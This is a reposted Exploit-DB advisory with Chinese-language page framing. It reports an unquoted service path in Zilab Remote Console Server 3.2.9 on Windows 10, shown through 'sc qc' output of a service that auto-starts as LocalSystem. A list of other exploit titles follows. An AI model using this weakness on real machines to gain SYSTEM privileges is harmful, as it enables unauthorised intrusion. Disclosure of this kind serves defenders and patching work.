Zilab Remote Console Server 3.2.9 – ‘zrcs’ Unquoted Service Path

Exploit Database
12 阅读

作者： cakes

日期： 2019-10-16
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/47506/

# Exploit Title : Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: Zilab Software Inc
# Version : Zilab Remote Console Server 3.2.9
# Software: http://html.tucows.com/preview/340137/Zilab-Remote-Console-Server?q=remote+support
# Tested on Windows 10
# CVE : N/A 


C:\Users\Administrator>sc qc zrcs
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: zrcs
TYPE : 10WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL: 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\Zilab\ZRCS\ZRCS.exe
LOAD_ORDER_GROUP :
TAG: 0
DISPLAY_NAME : Zilab Remote Console Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

last Exploits
Zilab Remote Console Server 3.2.9 – ‘zrcs’ Unquoted Service Path的更多信息

FTP Navigator 8.03 – Stack Overflow (SEH)：
Sim Editor 6.6 – Local Stack Buffer Overflow：
WorkgroupMail 7.5.1 – ‘WorkgroupMail’ Unquoted Service Path：
RealNetworks RealPlayer 16.0.3.51/16.0.2.32 – ‘.rmp’ Version Attribute Buffer Overflow：
Comodo Anti-Virus – ‘SHFolder.dll’ Local Privilege Escalation：
VUPlayer 2.49 .m3u – Local Buffer Overflow (DEP,ASLR)：
Microsoft Office 2010 – ‘.RTF’ Header Stack Overflow：
Mediacoder 0.7.3.4682 – Universal Buffer Overflow (SEH)：